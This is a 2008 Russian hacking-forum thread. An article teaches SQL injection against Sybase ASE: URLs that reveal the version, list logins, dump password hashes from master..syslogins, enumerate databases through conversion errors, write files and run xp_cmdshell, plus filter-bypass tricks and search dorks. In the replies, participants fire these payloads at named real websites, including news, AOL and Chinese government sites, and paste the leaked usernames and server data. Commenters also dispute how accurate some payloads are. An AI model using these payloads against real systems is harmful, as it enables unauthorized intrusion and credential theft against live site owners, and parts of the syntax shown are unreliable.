PDA

Просмотр полной версии : Проведение SQL инъекций в Sybase ASE


~!DoK_tOR!~
25.07.2008, 23:43
Проведение SQL инъекций в Sybase ASE

Автор: ~!Dok_tOR!~
Дата: 25.07.2008

Special for antichat.ru

[Intro]

В данной статье будет рассмотрено проведения SQL инъекций в Sybase. Я думаю многим будет интересно почитать об этой СУБД так как взламывать MySQL уже научился каждый 3-ий а когда появляется что-то нестандартное, непонятное возникают проблемы, я не исключаю того что ты мог вообще никогда не слышать о СУБД Sybase. Заглянем в историю ...

[History]

Sybase Inc. — пионер среди компаний, специализирующихся на разработке реляционных баз данных, а также других продуктов, связанных со сбором, обработкой и хранением данных. Кроме названия компании, слово «Sybase» также часто используется как наименования наиболее широко известного ее продукта — системы управления базами данных Adaptive Server Enterprise.
Архитекторами Sybase были доктор Роберт Эпштейн (Dr. Robert Epstein) и Том Хаггин (Tom Haggin), — оба они работали на Бритон-Ли и Университет Калифорния, Беркли, — в департаменте вычислительной техники. В Беркли впервые была разработана реляционная СУБД «University Ingres», которая стала эталоном таких СУБД как Ingres (Computer Associates), Informix (IBM) и NonStop SQL (Tandem), а также для большинства сегодняшних SQL-систем.Sybase оказалась на втором месте среди используемых в мире баз данных, сразу за Oracle, после подписания договора о предоставлении исходного кода базы в Microsoft для выведения на рынок продукта на базе платформы OS/2 под названием «SQL Server». В это же время Sybase стала называть свою СУБД «Sybase SQL Server». Вплоть до версии 4.9, Sybase SQL Server и Microsoft SQL Server были практически идентичными. Однако в связи с возникшими разногласиями между компаниями, связанными с вопросами разделения доходов, Sybase и Microsoft приняли решение прекратить совместное развитие продукта несмотря на очевидное наличие общего наследия в виде процедурного языка Transact-SQL (T-SQL) и одинаковой архитектуры. Существенное отличие заключается в том, что Sybase была основана на базе UNIX-архитектуры, в то время как Microsoft практически сразу ушел с UNIX и целиком сконцентрировался на платформе Windows NT. В настоящее время, Sybase продолжает поддерживать и развивать версии для семейства Windows, и различных UNIX-платформ (IBM AIX, HP-UX, Sun Solaris, GNU/Linux и другие).

Офф.сайт www.sybase.com

[Error Messages]

Уявимый параметр search, подставляем ковычку:

http://site.com/index.php?search='


Warning: sybase_query():
Warning: sybase_num_rows():


com.sybase.jdbc2.jdbc.SybSQLException: Unclosed quote before the
character string '''. com.sybase.jdbc2.jdbc.SybSQLException: Incorrect syntax near '''.

ещё ошибка может быть вот такой

com.sybase.jdbc2.jdbc.SybSQLException: Syntax error during explicit
conversion of VARCHAR value ''' to a INT field.

Error Message Sybase (http://www.sybase.com/detail_list?id=9897)

[SQL Injection]

Обрезать запрос можно использовав комментарий: /**/ , --

SQL comments (http://manuals.sybase.com/onlinebooks/group-as/asg1250e/sqlug/@Generic__BookTextView/3747;hf=0)

Подбор стоолбцов:
http://site.com/index.php?search=-1+union+select+null--

Узнаём версию Sybase:
http://site.com/index.php?search=-1+union+select+@@version--

или

http://site.com/index.php?search=')+and+1=convert(integer,(select+ @@version))--

и видим ответ сервера

Adaptive Server Enterprise/12.5.2/EBF 11948 ESD#1/P/NT (IX86)/OS
4.0/ase1252/1838/32-bit/OPT/Sat May 29 03:34:29 2004

12.5.2 - это номер версии Sybase;
EBF 11948 - число "непредвиденного исправления(bug fix)";
ESD#1 - число "Электронной Программной Поставки", которое является корректором;

Для того, чтобы получить целое через ошибку рассмотренную выше, мы просто преобразовываем целое в строку:

convert(integer,(select 'z' + str(@@version_as_integer)))

В итоге

http://site.com/index.php?search=')+and+1=convert(integer,(select+ 'z'%2bstr(@@version_as_integer)))--

возвращает результат

com.sybase.jdbc2.jdbc.SybSQLException: Syntax error during explicit
conversion of VARCHAR value 'z 12500' to a INT field.

12.5.0 - версия Sybase

В общих чертах, для того чтобы получать переменную произвольного типа данных, использовавших сообщение конверсионной ошибки целого, пропишите переменную в строку сначала, затем выполните преобразование целого.

допустим уязвимый код такой:

String search = request.getParameter("search");
ResultSet rs = stmt.executeQuery("select * from pubs2..titles where UPPER(title) like UPPER('%" + search + "%')");

Выводим имена всех пользователей:
http://site.com/index.php?search=-1+union+select+name+from+syslogins--

или

http://site.com/index.php?search=-1+union+select+name+from+master..syslogins--

Выводим хеши паролей юзеров:
http://site.com/index.php?search=-1+union+select+password+from+syslogins--

Cписок баз данных на сервере:
http://site.com/index.php?search=')+and+1=convert(integer,(select+ min(name)+from+sysdatabases+where+name>''))--

получаем ошибку вида

com.sybase.jdbc2.jdbc.SybSQLException: Syntax error during explicit
conversion of VARCHAR value 'master' to a INT field.

в ошибке присутствует слово master - это и есть первая колонка. Для того, чтобы получить следующию, мы модифицируем запрос, так чтобы выбиря наименьшию величину, что больше, чем master, таким образом:

http://site.com/index.php?search=')+and+1=convert(integer,(select+ min(name)+from+sysdatabases+where+name>'master'))--

получили

com.sybase.jdbc2.jdbc.SybSQLException: Syntax error during explicit
conversion of VARCHAR value 'blabla' to a INT field.

Таким образом мы повторяем полностью все колонки пока наше утверждение выбора не возвращает никакие дальнейшие данные.

Используем запрос Transact-SQL's, группирующий характеристику:
http://site.com/index.php?search=')+create+table+foo(a+integer)--

серьезная проблема безопасности, для неё характерны несколько причин:

1. Хакер может послать запрос, включая Обработку Данных Языковых утверждений (DML) и Определения Данных Языковых утверждений (DDL).
2. Хакер использует pre-authenticated подлинный канал, который предусмотрен приложением. В примере выше, приложение удостоверяет как "sa" , так что хакер может легко управлять сервером, выполняющим Sybase but нормально счет должен быть более низким-привилегированным счетом пользователя.

search = search.replaceAll( "'", "''");

после вызова на getParameter, единственные кавычки "удваиваются". Конечно, это не будет работать для числовых данных поскольку числа не ограничены в выполнении SQL. Если наш поиск был для pub_id, хакер мог бы просто послать SQL запрос непосредственно после числа, не требуя единственные кавычки.

[Запись в файл]

create table myfile (record varchar(2000)) external
file at "C:\temp\file.txt" insert into myfile
values(0xYOU_BINARY_DATA)"

[xp_cmdshell]

Только администраторы могут выполнить xp_cmdshell, по умолчанию.

Запись в файл через xp_cmdshell:

declare @cmd varchar(255) select @cmd='echo blablabla >> C:\file.txt'
exec xp_cmdshell @cmd

Так как Sybase и MSSQL - довольно схожие системы, то и синтаксис команд во многом схож:

xp_cmdshell 'command'

Например:

xp_cmdshell 'net users'

выведет учетные записи пользователей системы.

[xp_regread]

Sybase не имеет эквивалент xp_regread, так что любые хитрости (как например, чтение SAM файла под Windows) не будет работать в Sybase.

В MSSQL, функция exec позволяет нам, выполнять динамический запрос. Например:

exec('select @@version')

Если запрос не сработает то попробуйте обойти вот так:

exec('sel'+'ect @'+'@ver'+'sion')

Ёще как вариат закодировать целую строку в литерале:

declare @s varchar(2000)
set @s=0x73656C65637420404076657273696F6E
exec(@s)

В общих чертах, фильтрация ввода пользователя в SQL исключительно плохой путь адресовать инъекцию SQL. В некоторых случаях, удаляют ключевые слова так называемые "плохие слова", это может легко обойти использовать подобно этому:

selselectect @@ver@@versionsion

Это обычно срабатывает, если фильтр не установлен никакая подстановка не может быть сделана.

Dorks:

Warning: sybase_query()
Warning: sybase_num_rows()
Warning: sybase_fetch_array():
Warning: sybase_query(): Sybase: Server message:

Ссылки:

Официальный сайт (http://www.sybase.com/)
Cайт российского представительства (http://www.sybase.ru/)
Портал разработчиков под Sybase (http://www.sybasedevel.ru/)
Русскоязычные форумы по продуктам Sybase (http://www.sql.ru/forum/actualtopics.aspx?bid=30)

.Slip
25.07.2008, 23:58
>> Статья доказывает тот факт что, нет неуязвимых СУБД, каждая СУБД имеет те или иные баги
В статье были рассмотрены аспекты незащищённости Sybase aka (ASE).

Вроде как были описаны уязвимости используемые при уязвимом коде, каким местом к этому относятся уязвимости субд?

PS фака по этой субд на ачате нету, так что +

Jokester
26.07.2008, 13:42
Обрезать запрос можно использовав комментарий: -- или /*
T-SQL помоему не поддерживает /*
Узнаём версию Sybase:
http://site.com/index.php?search=-1+union+select+@@version()--
Разве это будет работать? Дело даже не в опечатке "@@version()"
Для того, чтобы получить целое через ошибку рассмотренную выше, мы просто преобразовываем целое в строку:
convert(integer,(select 'z' + str(@@version_as_integer)))Это если честно не понял , поясни, если не трудно.
Выводим имена всех пользователей:
http://site.com/index.php?search=-1+union+select+name+from+syslogins--
Опять-же , это разве работает? master..syslogins, ещё туда-сюда, но помоему конструкция запроса не верна

Cписок баз данных на сервере:
http://site.com/index.php?search=')+and+1=convert(integer,(select+ min(name)+from+sysdatabases+where+name>''))--Не понял откуда ты выводишь список баз?
"sysdatabases"- Это системная таблица какая-то?
Поясни пожалуйста

Используем запрос Transact-SQL's, группирующий характеристику:
http://site.com/index.php?search=')+create+table+foo(a+integer)--
серьезная проблема безопасности, для неё характерны несколько причин:
1. Хакер может послать запрос, включая Обработку Данных Языковых утверждений (DML) и Определения Данных Языковых утверждений (DDL).
2. Хакер использует pre-authenticated подлинный канал, который предусмотрен приложением. В примере выше, приложение удостоверяет как "sa" , так что хакер может легко управлять сервером, выполняющим Sybase but нормально счет должен быть более низким-привилегированным счетом пользователя.
search = search.replaceAll( "'", "''");
после вызова на getParameter, единственные кавычки "удваиваются". Конечно, это не будет работать для числовых данных поскольку числа не ограничены в выполнении SQL. Если наш поиск был для pub_id, хакер мог бы просто послать SQL запрос непосредственно после числа, не требуя единственные кавычки.Этот абзац не понял целиком, похоже на хреновый перевод, если можно объясни , что сдесь написано

Всё что ниже понятно, и взято отсюда :
http://www.xakep.ru/magazine/xa/105/082/1.asp

PS Я не придираюсь , просто тема очень интересна самому, возможно я что-то не понял просто, если можешь поясни плз.

~!DoK_tOR!~
26.07.2008, 18:18
T-SQL помоему не поддерживает /*

поддерживает.

Разве это будет работать? Дело даже не в опечатке "@@version()"

а ты как думаешь ? конечно будет . исправил

Это если честно не понял , поясни, если не трудно.

если версия
union+select+@@version
так не узнаётся или появляется ошибка

то преобразуем это в всё в конверсию целого aka convert ()

convert(integer,(select+@@version))--

Опять-же , это разве работает? master..syslogins, ещё туда-сюда, но помоему конструкция запроса не верна

пониаешь имена пользователей могу хранится в табличке syslogins так и в master..syslogins.

Не понял откуда ты выводишь список баз? "sysdatabases"- Это системная таблица какая-то?

список баз выводится из таблички sysdatabases или master..sysdatabases если тебе так не понятно то вот так

http://site.com/index.php?search=-1+union+select+name+from+sysdatabases--

или

http://site.com/index.php?search=-1+union+select+name+from+master..sysdatabases--

}{0TT@БЬ)Ч
26.07.2008, 20:52
>> Статья доказывает тот факт что, нет неуязвимых СУБД, каждая СУБД имеет те или иные баги
В статье были рассмотрены аспекты незащищённости Sybase aka (ASE).

Вроде как были описаны уязвимости используемые при уязвимом коде, каким местом к этому относятся уязвимости субд?

PS фака по этой субд на ачате нету, так что +
.Slip
это наводит на не очень хорошие мысли,ТС не совсем понял уязвимость sql inj.

~!DoK_tOR!~
10.08.2008, 00:50
Рассмотрим на конкретном примере

Запрос
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(integer,(select+@@ version))--


Adaptive Server Enterprise/12.5.3/EBF 13332 ESD#7/P/Linux Intel/Enterprise
Linux/ase1253/1951/32-bit/OPT/Fri Mar 24 00:40:52 2006


если выше метод не действует то:

http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(integer,(select+'z '%2bstr(@@version_as_integer)))--


Warning: sybase_query() [function.sybase-query]: Sybase: Server message: Syntax error during explicit conversion of VARCHAR value 'z 12500' to a INT field. (severity 16, procedure N/A) in /var/home/pda1.vmdaily.ru/classes/db.clss on line 21


12.5.0 - версия Sybase

http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(integer,(select+@@vers ion))--


Adaptive Server Enterprise/12.5.3/EBF 12593 ESD#3/P/Sun_svr4/OS 5.8/
ase1253/1911/64-bit/FBO/Fri Jul 8 13:31:40 2005

Jokester
10.08.2008, 18:19
Рассмотрим на конкретном примере
Конструктивная критика :)

Вывод версии, это конечно круто, но и он идёт в твоём примере через and
А ты в начале статьи писал о работе с оператором Union
Я бы хотел что-бы ты показал пример работы с ним

Дело в том, что в Sybase как и в MSSQL достаточно бредовая затея работать с оператором UNION(ИМХО)
И если ты его описываешь, то покажи пример рабочего запроса,что-бы люди видели как это

Вот нормальная работа с базой Sybase: Описана Scipio сдесь:
http://forum.antichat.ru/showpost.php?p=626114&postcount=5170

В примере приведённом тобой это выглядит так:
Юзер:
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(user_name ()))--
webuser

http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins))--
wwwstat
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins+where+dbname+not+ in+(0x77777773746174,0x7765626462)))
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins))
wwwstat
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins+where+dbname+not+ in+(0x77777773746174)))
webdb
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins+where+dbname+not+ in+(0x77777773746174,0x7765626462)))
vm
и т.д.
Вывод идёт из master..syslogins, ты пишешь
пониаешь имена пользователей могу хранится в табличке syslogins так и в master..sysloginsпробуем:
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+syslogins))
Ошибка
Опять-же, либо объясни, либо исправь

Далее, комментарий /*

T-SQL помоему не поддерживает /*
поддерживает.
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins))/*
Ошибка, почему??

Ну и повторюсь, покажи работу union

~!DoK_tOR!~
10.08.2008, 19:08
А ты в начале статьи писал о работе с оператором Union


и рядом о работе с подзапросами ) с подзапросами работать легче )

Сообщение от ~!DoK_tOR!~
пониаешь имена пользователей могу хранится в табличке syslogins так и в master..syslogins

пробуем:
http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+syslogins))
Ошибка
Опять-же, либо объясни, либо исправь

по дефлойту используется табличка master..syslogins а syslogins очень редко в стречается ) Я имею ввиду что если master..syslogins not found то используется табличка syslogins )


http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins))/*
Ошибка, почему??


исправил используется комментарий /**/

http://pda.vmdaily.ru/article.php?aid=1+and+1=convert(numeric,(select+ma x(dbname)+from+master..syslogins))/**/

Пользователи:

http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(na me)+from+master..syslogins))--

Пароли:
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(pa ssword)+from+master..syslogins))--

http://www.shmsa.gov.cn:8088/ggl.detail.php?ChannelID=754&ggl_id=convert(numeric,(select+max(password)+from+ master..syslogins))/**/

http://www.shmsa.gov.cn:8088/ggl.detail.php?ChannelID=754&ggl_id=convert(numeric,(select+max(name)+from+mast er..syslogins))/**/

Jokester
10.08.2008, 19:31
и рядом о работе с подзапросами ) с подзапросами работать легче )
and это не подзапрос, просто логическое условие
Примеров работы с подзапросами в твоём описании нет

Будешь показывать подзапросы? :D

ЗЫ Описание Scipio гораздо понятнее и удобнее, хорошо бы его воткнуть сюда вместо моих примеров, что-бы всё было в одном месте, но это конечно ему самому решать

guest3297
07.10.2008, 08:56
declare @cmd varchar(255) select @cmd='echo blablabla >> C:\file.txt'
exec xp_cmdshell @cmd
Как ты это конкретно в иньекции применить собираешься?


exec('sel'+'ect @'+'@ver'+'sion')
Запустика конслольку ASE и введи 'sel'+'ect @'+'@ver'+'sion'
А зачем тут скобки?

пониаешь имена пользователей могу хранится в табличке syslogins так и в master..syslogins.

Превиду пример с mysql
выводим database() (db_name() ase) текущая база 'demo'
"имена пользователей могу хранится в табличке user так и в mysql.user"

master это системная таблица (аналогично mysql.user) и syslogins храниться только там.
запрос select syslogins прокатит только тогда когда это твоя текущая база,
что при иньекции не возможно.

p.s.
Создаеться впечатление что автор не понимает о чем он пишет.

Про ASA и IQ даже не упоминалось.

имхо TSQL и есть TSQL

[Raz0r]
07.10.2008, 11:03
исправил используется комментарий /**/
информация проверена? Мне с трудом верится, что такое возможно. Ведь оставшаяся часть запроса останется незакомментированной - соответственно возникнет ошибка синтаксиса. Взять к примеру вот этот пример:
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(na me)+from+master..syslogins))--
Пробуем с /*
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(na me)+from+master..syslogins))/*
->
Missing end comment mark
Пробуем так /**/
http://futbolsoccer.aol.com.mx/mexico/apertura2005/home/index.php?t=1+and+1=convert(numeric,(select+max(na me)+from+master..syslogins))/**/
->
Incorrect syntax near '='
Очевидно, что в последнем запросе возникла ошибка синтаксиса.